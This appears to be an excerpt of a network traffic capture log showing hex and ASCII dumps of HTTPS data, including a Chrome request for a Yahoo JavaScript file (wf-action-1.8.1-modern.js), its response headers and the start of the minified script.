                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 61 83 bc 74 54 20 c0 d1 26 e9 e6 1c 9f ac 8e e6 eb c8 19 49 9b a1 95 b2 fc f0 fe 6a a1 fe 33 1c 52 17 4d f7 dd 17 31 9e ab 8f ff 04 98 b7 b0 df c1 34 43 a6 e6 c3 0d 4f 29 71 51 87 1c 3c 1c 42 e1 7c 34 dd 98 e9 0e 8f b7 74 66 db e7 3e 08 b4 35 a5 2d 43 6d e3 3f 49 3c c8 07 71 be 5f 78 86 b9 ab 3a bb fb bd 20 02 33 de 3a 82 0d b6 0e 0f de 66 30 e4 b1 55 f2 63 13 dd db 04 5a c1 14 90 fe 48 d1 93 06 45 5e c0 40 74 cc ad 91 b8 ad f8 37 e1 86 11 75 fb e7 a4 77 57 2d 90 3b b9 8d 9e dc ca 3a 92 59 e2 1c 1a f1 c7 51 21 28 fd 5d 7c 7a 6c 69 f5 11 5a d2 da 86 81 a4 fd a3 a3 c6 f6 90 2f 90 39 f2 e5 29 48 0b bc fe bc eb eb 73 8a 76 1f e5 36 a9 51 13 0e 3b 2a 8b 2a 5d e2 be 24 2d 75 5e 64 a1 12 c6 78 55 9d e0 96 c5 17 42 ca 6c 20 4b 01 2a 8d 52 8d f3 e4 82 fd 80 c7 ad
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: atT &Ij3RM14CO)qQ<B|4tf>5-Cm?I<q_x: 3:f0UcZHE^@t7uwW-;:YQ!(]|zliZ/9)Hsv6Q;**]$-u^dxUBl K*R
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: ac 24 73 a2 db 38 60 9a 62 d5 b1 1f 1f 19 90 ac 63 69 98 d1 b0 93 a4 cb 9b a6 91 30 01 47 de 4a 71 bc 96 73 f8 f2 ad 8b ab 85 d1 03 3c 04 55 0d 5c 1b c8 e1 b2 69 dd 20 2c af 04 56 5b 44 2e 90 e3 25 f0 9f aa e6 24 d1 9a a8 54 51 e3 69 93 2d 5e 72 4c 0e 3c 30 d2 05 8b ee 40 ea e1 a9 43 b2 5a bf 65 c8 01 ae 13 94 bc a0 df 72 6e ec 90 09 cd bd eb 30 f5 69 40 22 fb b1 ec 99 8f 7a c4 59 cd 54 78 8d 48 8a cd fc 1e b9 55 56 e9 00 3f 88 3d 6a 63 43 06 d0 cb 37 e1 9e e7 6b f7 7f b7 e1 4c 1e 00 cd 44 eb 1b 82 30 0e c5 7d aa cb 1b 7d 9e 78 04 d7 5d 4b d6 db 2d 2a a3 37 09 c4 0d 02 20 97 41 e6 1f 2a 69 10 1a e2 85 9a 9d 96 70 ed ba 00 78 aa 86 83 2e 44 32 da ef 2a be 17 bf ba fe 75 f7 dd bf b7 45 bf 36 94 3d db 25 61 2b a1 99 85 fa 9f 5d 5a de 20 8a 45 26 78 17 8e a1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: $s8`bci0GJqs<U\i ,V[D.%$TQi-^rL<0@CZern0i@"zYTxHUV?=jcC7kLD0}}x]K-*7 A*ipx.D2*uE6=%a+]Z E&x
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 8f ad 91 3a a7 bc 5c 92 73 74 99 a4 0e 1f d8 6d 22 c3 f9 fa fb fe 9d 8a ae c1 d4 6c 03 87 c1 d9 be 5b f4 cc 82 48 46 81 aa 72 65 38 06 96 56 dc d0 24 11 ab ac b0 66 a4 27 ae 2e ed 4b a7 1c 86 58 b5 98 ad 16 82 d1 d5 42 08 f4 cc 2e cc 21 a1 10 ec 4a c8 4a 2b d4 b9 a5 40 04 54 79 4e 10 df ec c7 d1 0f 43 23 48 05 28 59 c8 fd fa 2f 9b 38 ab b9 4f 92 c8 a6 64 ce 9b ce dd d7 1a 1b 66 db 30 43 2d c1 b8 38 f6 09 d6 b4 a3 c1 fd 1a ea 91 df 62 0d bb 01 5d 44 0e 55 af 48 49 42 48 60 55 cd d3 fb 6e 15 9c 72 4c f6 17 d1 56 f6 b9 0d 4b 8c cf e8 bd 93 bf 30 f1 29 ec 63 7c c2 5e 0f f2 7a 9f 7d e9 cb e2 5d 1d 77 26 c8 ce 8c 9a 43 4b a6 33 d5 0e 60 a2 f1 f2 3b 59 f9 26 d3 ff 9b 9b ad 9b 0d 20 fa e9 38 d2 57 27 11 3b f0 19 fd de e8 2a 84 34 93 2c 8c b8 7e 05 c5 c2 c6 cb 42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: :\stm"l[HFre8V$f'.KXB.!JJ+@TyNC#H(Y/8Odf0C-8b]DUHIBH`UnrLVK0)c|^z}]w&CK3`;Y& 8W';*4,~B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 5f 84 37 0c b1 c3 c3 77 ff ed 6e ce e1 e4 47 34 55 5a a2 25 ae 4f 26 17 72 e4 a0 4e 66 9d 97 f5 01 12 da 29 5c 83 a9 74 41 24 6e a3 77 4b cd 01 8c 22 68 72 4a ba ff 06 2c d2 24 3c 77 c2 09 59 78 0e 12 ff 4a a3 c8 ee 22 d2 c1 a9 7d ee 51 35 ce 63 16 cc 3d 7d db 0a b0 5c f7 ec cb 94 0c 54 c0 4c a2 c0 0d 54 1b b9 c3 7f dd e9 c6 ac 12 70 c1 ee cc 07 43 02 ef 6d 2a 45 83 72 33 91 92 4c e4 3a 88 66 76 c9 a4 76 06 95 56 c7 b9 df c1 1b c9 c0 bc d1 c2 59 d6 aa 54 dd 5f 9b f4 23 7b 20 52 1f 3c f4 9e 1f 50 09 af 0e 50 b1 0e c2 f4 71 f9 61 23 73 3f 63 8d dc 75 bd 6c 89 44 af 53 16 9b ef 10 d2 ed 33 fb 78 a1 b9 52 d0 e1 b1 02 90 7b 70 9f 57 b4 e6 ac 87 f0 9d 71 55 38 f7 c5 51 53 6a a1 24 fb 76 6b 38 32 6f 79 52 55 9f b2 99 2d ae 00 00 b9 66 53 52 8a ac 10 00 bf 08 33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: _7wnG4UZ%O&rNf)\tA$nwK"hrJ,$<wYxJ"}Q5c=}\TLTpCm*Er3L:fvvVYT_#{ R<PPqa#s?culDS3xR{pWqU8QSj$vk82oyRU-fSR3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 1e ec 16 bf c7 27 97 c7 96 2f a8 55 d2 18 aa e1 93 8b 2d 77 c7 07 51 17 44 1c 65 f4 f3 83 fe e1 b9 4d 1f 48 7e 6a 5c 22 ac b2 64 a4 85 4e 53 a2 de 33 76 8d eb d0 ab 2f ed 1c 20 a5 7f b3 d3 a8 7c f3 64 e2 bf 35 73 33 14 80 e4 6f 6a a0 1d 26 44 67 8a 99 8f 98 b7 72 12 8d 90 99 0a 2c d0 d7 c9 59 12 1f 8b 94 b1 30 6e 22 2a 04 e2 e9 c6 e8 25 dd fb 60 a9 eb b0 68 e9 6b be 42 9b 10 ae 67 e5 1d 1a c3 6f f4 71 01 e1 b4 d1 a3 82 fd d4 53 be 54 0c af 27 84 4d 44 62 8b 14 86 82 eb 2a 14 cd 32 e0 49 65 60 5e 6f 3f 9b ef d4 f9 62 18 46 a1 f0 18 46 02 d7 46 5f a9 d3 05 bb b9 1c a4 b7 e1 1d 40 6f 64 19 06 13 f8 e7 ee bd b7 86 fd 7e 42 bf 7c dd c7 0e c8 00 d0 48 63 96 9b 1a 60 d8 aa 55 4b 19 be 8d d6 1c 2b a9 f7 35 6f d8 bf d1 88 4b 37 3b 03 66 66 be 59 2d 41 7a a6 91 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: '/U-wQDeMH~j\"dNS3v/ |d5s3oj&Dgr,Y0n"*%`hkBgoqST'MDb*2Ie`^o?bFFF_@od~B|Hc`UK+5oK7;ffY-Azl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: f6 72 7d 28 5c 58 b0 f5 13 5b da 13 5f 66 5a bc f0 6d 8d d7 5d 57 2e 9b 97 2d 41 b1 9b 3d d6 8e c9 9e 18 fd 7a 21 74 7c 66 d6 60 90 30 a8 46 98 94 ec fb 16 bc f4 a1 e5 67 6e 82 dd 4b 3d 9e 25 db 68 e8 dc b5 c2 3f d1 74 1d 9f 96 72 d5 2c 2a c9 1d 36 f9 cd c9 63 db db 4d e7 07 4b 70 36 e3 03 b8 a0 92 c1 27 27 fc 02 13 da 3c 33 28 11 93 2b 31 50 1c 4c d3 31 e9 12 de 42 2e 9a c4 74 ac 84 d2 4c 5f d1 ab c0 3a 6b 57 ab d8 8c 0e 8a 3d b3 53 bc 00 15 33 76 40 d5 76 a3 eb 57 32 b8 89 c7 0a 68 e5 b9 22 81 cf 11 66 80 12 76 53 72 90 db c8 9a 21 95 37 ad 16 5b 30 b5 93 01 90 ef b3 d2 d8 0c f5 f6 82 48 3d 76 ff d3 9f 6b c9 f4 40 a0 3b 86 2e 78 42 80 e0 0f 2e 80 f1 1d 3e d2 5d 3d 11 44 b0 fb 54 42 6d 0c 78 38 7c 35 e9 67 de c6 b7 ab 3e c3 d8 a9 f8 ad 7b 57 b7 35 c4 53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: r}(\X[_fZm]W.-A=z!t|f`0FgnK=%h?tr,*6cMKp6''<3(+1PL1B.tL_:kW=S3v@vW2h"fvSr!7[0H=vk@;.xB.>]=DTBmx8|5g>{W5S
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: c2 27 5b 25 cf 38 66 4f 7a 1a 4b 94 a6 1f 7a 50 f4 f1 c0 8a b2 0b 99 07 9f 9b 53 ff 08 2f 07 9e 11 ec 75 32 29 20 fb de ba c1 5f 0c 93 d8 8b 31 6a 11 03 a9 2c 24 19 ec 46 43 5f c3 b1 9a a1 0d c5 51 87 0d b2 46 28 8b 3a c5 78 fe 40 85 83 f2 d7 21 b5 b9 11 e7 7a fb 4c 75 6b cb 9b 36 40 0c c8 01 b9 21 17 6c 78 0c f9 ae d5 02 1b 47 d7 20 0e 9d 73 6e 55 b6 bd 3f db 4b 19 02 e8 4a 9e dc 36 fb 61 31 c0 cf 9c 62 3e 99 08 6d 61 52 44 c3 6b fc 69 b6 27 b6 c8 71 05 d0 26 11 8b 5e d7 dd 7d 2b 2b d7 ab 83 b7 8b e0 79 47 c8 8b 17 62 37 ce 0f 96 14 d2 45 27 d9 b3 c9 8a 80 64 e1 d6 2a 6f ee a2 75 ec 4c 22 3c 2b 6b 1c 0c 46 7f 57 ec 7e 79 43 89 4e e7 ed c2 49 bf b8 d3 e6 49 f5 77 4d c2 21 eb e4 69 a2 75 64 5c 57 36 ae 95 fc 65 dd 45 7c db 91 d4 79 3a b3 82 80 dc d2 b3 88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: '[%8fOzKzPS/u2) _1j,$FC_QF(:x@!zLuk6@!lxG snU?KJ6a1b>maRDki'q&^}++yGb7E'd*ouL"<+kFW~yCNIIwM!iud\W6eE|y:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 7e ca c3 d2 e4 1f 72 b3 85 f6 96 83 95 24 0d 4f 06 72 1e f1 83 f8 0e a4 e9 e9 1c 81 ae e4 8e c1 f7 3c 45 d9 22 48 38 91 65 d1 f0 a6 c5 ce 33 e1 5b ea 85 b5 53 8e 04 86 ec 9a 53 18 f8 a0 8c e7 cb da 0f e9 48 d9 b6 9f 0a a1 94 ab b7 d8 52 e6 9f 41 8d d6 b6 3a 49 58 97 5d 8b 24 24 da 96 e6 7c 31 e3 7a 6b a9 a5 67 17 b7 cf f8 5f c3 e3 7c de 41 f3 39 29 24 d8 43 71 3e 8b 4c 6a 85 30 c0 83 7c 37 e1 13 00 42 df 2e 30 e1 42 a3 ca f0 c7 bd b6 1c bc a5 6e 89 a2 38 ac f4 4f 02 66 71 94 f5 42 c8 b0 1c e3 a9 0d 25 a8 5f f5 87 fb ed 2d 0d a5 b2 88 a6 65 43 cb 11 90 53 5a d3 7b 86 2b b0 70 cb 42 41 56 b5 59 9f 5b bf e2 97 b7 c9 a0 01 bf 96 7a fe 74 45 ce 0c ea 12 44 f4 33 28 e3 d1 2e 43 a4 39 9b 9e e7 bb 2a 0b 53 f1 8c c8 bf 5b f5 82 79 51 44 ef 36 a1 15 e5 ca 8e dc 22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ~r$Or<E"H8e3[SSHRA:IX]$$|1zkg_|A9)$Cq>Lj0|7B.0Bn8OfqB%_-eCSZ{+pBAVY[ztED3(.C9*S[yQD6"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: d6 75 16 02 cc 84 e7 59 43 01 0b 91 06 6d 0d 0d 38 1e 15 c3 fb 38 7f 96 a6 47 78 3f 76 98 51 03 2f 43 ff 13 04 d4 db 9b 20 40 b7 79 b6 31 f9 7b 5f 65 e0 3c bc b4 90 a8 fd 05 ad 15 e8 e5 da 35 bf 2b a6 e9 69 ef b1 af a1 88 7a 28 02 73 e4 ae fb c4 91 44 9d d2 da ce 33 36 d0 77 b0 c1 01 9b de 50 8b 7b 13 b8 cf f6 e5 aa 1d a6 a2 61 83 1a 0c 48 a0 b2 18 e5 8e a0 4b d3 62 e7 d8 3a 21 36 b2 07 06 5f 47 b3 ed 67 78 e4 ac 90 31 5f b4 22 d8 af 0b eb bd bf 45 d8 ee 6c 70 f9 2f fc 75 8b f4 ee 28 7c 1e a5 f9 a2 54 6c 01 47 e2 8a e9 2a f7 b9 39 d7 8c 2a fa e1 36 2c cb 70 cd 8d 5e af 40 c3 db e8 27 e5 ec dc 6d ae b5 da 74 1f e1 12 b6 26 16 d9 3f 67 fb 22 6f 76 2c d3 43 64 c3 b0 5b a8 1d 12 de b2 6d 58 c8 d4 71 e4 ed 1c 7c 1c 0a 8c 4d 2c 5f b2 fd 95 09 1f 34 c0 98 1f b8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: uYCm88Gx?vQ/C @y1{_e<5+iz(sD36wP{aHKb:!6_Ggx1_"Elp/u(|TlG*9*6,p^@'mt&?g"ov,Cd[mXq|M,_4


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              142192.168.2.45117287.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC366OUTGET /aaq/wf/wf-action-1.8.1-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: DMiY+1vctXW4ZdRt5lwoyH6Ew0OdIsVBOYBz93fRLNc1HrJr4QAS24798clLnCI2tQ68pxtr9N4=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: M8BAEY7FCQMDJER5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Thu, 03 Oct 2024 04:43:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 21 Dec 2023 17:55:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "4443a60b3d3645610c9e65b7cc9f15bb"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: wiQ3AdVTneuswkykDVtSm3aaY9QhtZW9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 13778
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 484226
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 61 63 74 69 6f 6e 22 2c 5b 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 61 63 74 69 6f 6e 22 5d 3d 65 28 29 3a 28 74 2e 77 61 66 65 72 3d 74 2e 77 61 66 65 72 7c 7c 7b 7d 2c 74 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 74 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-action",[],e):"object"==typeof exports?exports["wafer-action"]=e():(t.wafer=t.wafer||{},t.wafer.wafers=t.wafer.wafers||
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 65 26 26 6e 75 6c 6c 21 3d 3d 65 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 65 29 3b 74 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 65 26 26 65 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 74 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 65 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: unction"!=typeof e&&null!==e)throw new TypeError("Super expression must either be null or a function, not "+typeof e);t.prototype=Object.create(e&&e.prototype,{constructor:{value:t,enumerable:!1,writable:!0,configurable:!0}}),e&&(Object.setPrototypeOf?Obj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 6e 61 6c 6c 79 7b 69 66 28 69 29 74 68 72 6f 77 20 6f 7d 7d 72 65 74 75 72 6e 20 72 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 3b 69 66 28 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 20 69 6e 20 4f 62 6a 65 63 74 28 65 29 29 72 65 74 75 72 6e 20 74 28 65 2c 72 29 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 22 29 7d 7d 28 29 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 65 2e 6c 65 6e 67 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: nally{if(i)throw o}}return r}return function(e,r){if(Array.isArray(e))return e;if(Symbol.iterator in Object(e))return t(e,r);throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),f=function(){function t(t,e){for(var r=0;r<e.lengt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 67 6f 72 79 22 29 7c 7c 22 22 2c 49 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 67 2b 22 61 63 74 69 6f 6e 2d 69 64 22 29 7c 7c 75 2c 50 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 67 2b 22 61 63 74 69 6f 6e 2d 6c 61 62 65 6c 22 29 2c 4c 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 67 2b 22 61 63 74 69 6f 6e 2d 79 6c 6b 22 29 2c 43 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 67 2b 22 61 63 74 69 6f 6e 2d 6e 61 6d 65 22 29 7c 7c 66 2c 6a 3d 50 26 26 50 2e 73 70 6c 69 74 28 22 7c 22 29 7c 7c 5b 5d 2c 52 3d 70 28 6a 2c 32 29 2c 48 3d 52 5b 30 5d 2c 42 3d 52 5b 31 5d 2c 46 3d 4c 26 26 4c 2e 73 70 6c 69 74 28 22 7c 22 29 7c 7c 5b 5d 2c 57 3d 70 28 46 2c 32 29 2c 78 3d 57 5b 30 5d 2c 4e 3d 57 5b 31 5d 2c 44 3d 74 2e 67 65 74 41 74 74 72 69 62 75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: gory")||"",I=t.getAttribute(g+"action-id")||u,P=t.getAttribute(g+"action-label"),L=t.getAttribute(g+"action-ylk"),C=t.getAttribute(g+"action-name")||f,j=P&&P.split("|")||[],R=p(j,2),H=R[0],B=R[1],F=L&&L.split("|")||[],W=p(F,2),x=W[0],N=W[1],D=t.getAttribu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 6e 50 72 6f 67 72 65 73 73 3a 21 31 7d 2c 22 72 65 61 63 74 69 6f 6e 73 22 3d 3d 3d 54 26 26 28 76 2e 5f 75 74 69 6c 2e 69 73 52 65 61 63 74 69 6f 6e 3d 21 30 2c 76 2e 5f 73 74 61 74 65 2e 69 73 52 65 61 63 74 69 6f 6e 46 65 74 63 68 65 64 3d 21 31 29 2c 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 61 73 2d 61 63 74 69 6f 6e 2d 63 6c 69 63 6b 22 2c 22 68 61 73 2d 77 61 66 65 72 2d 63 6c 69 63 6b 22 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 2e 73 65 74 41 63 74 69 6f 6e 53 74 61 74 75 73 28 74 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 4f 29 29 7d 2c 30 29 2c 76 7d 72 65 74 75 72 6e 20 6e 28 65 2c 74 29 2c 66 28 65 2c 5b 7b 6b 65 79 3a 22 72 65 6e 64 65 72 41 63 74 69 6f 6e 54 65 6d 70 6c 61 74 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: nProgress:!1},"reactions"===T&&(v._util.isReaction=!0,v._state.isReactionFetched=!1),t.classList.add("has-action-click","has-wafer-click"),setTimeout(function(){v.setActionStatus(t.classList.contains(O))},0),v}return n(e,t),f(e,[{key:"renderActionTemplate
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 73 4c 69 73 74 2e 61 64 64 28 4f 29 29 3a 28 6e 26 26 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 79 6c 6b 22 2c 73 2b 22 3b 22 2b 69 29 2c 6f 26 26 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 69 74 6c 65 22 2c 6f 29 2c 65 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 4f 29 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 74 72 69 67 67 65 72 54 6f 70 69 63 41 63 74 69 6f 6e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 72 3d 65 2e 61 70 70 49 64 2c 69 3d 65 2e 61 63 74 69 6f 6e 48 6f 73 74 2c 6f 3d 65 2e 62 6f 6f 6b 6d 61 72 6b 41 63 74 69 6f 6e 48 6f 73 74 2c 6e 3d 65 2e 69 64 2c 73 3d 65 2e 73 75 62 54 79 70 65 2c 63 3d 65 2e 73 75 62 54 79 70 65 43 61 74 65 67 6f 72 79
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: sList.add(O)):(n&&e.setAttribute("data-ylk",s+";"+i),o&&e.setAttribute("title",o),e.classList.remove(O))}}},{key:"triggerTopicAction",value:function(t){var e=this._util,r=e.appId,i=e.actionHost,o=e.bookmarkActionHost,n=e.id,s=e.subType,c=e.subTypeCategory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 7d 7d 7d 29 3b 72 65 74 75 72 6e 20 77 28 70 2c 7b 62 6f 64 79 3a 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 6d 29 2c 63 61 63 68 65 3a 30 2c 63 6c 69 65 6e 74 48 65 61 64 65 72 73 3a 62 2c 63 72 65 64 65 6e 74 69 61 6c 73 3a 22 69 6e 63 6c 75 64 65 22 2c 6d 65 74 68 6f 64 3a 64 2c 6d 6f 64 65 3a 22 63 6f 72 73 22 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 43 72 75 6d 62 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 65 3d 74 2e 61 63 74 69 6f 6e 48 6f 73 74 2c 72 3d 74 2e 61 70 70 49 64 2c 61 3d 74 2e 62 6f 6f 6b 6d 61 72 6b 41 63 74 69 6f 6e 48 6f 73 74 2c 69 3d 74 2e 73 75 62 54 79 70 65 2c 6f 3d 74 2e 74 79 70 65 3b 69 66 28 22 6c 6f 63 61 74 69 6f 6e 22 3d 3d 3d 6f 29 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: }}});return w(p,{body:JSON.stringify(m),cache:0,clientHeaders:b,credentials:"include",method:d,mode:"cors"})}},{key:"getCrumb",value:function(){var t=this._util,e=t.actionHost,r=t.appId,a=t.bookmarkActionHost,i=t.subType,o=t.type;if("location"===o)return
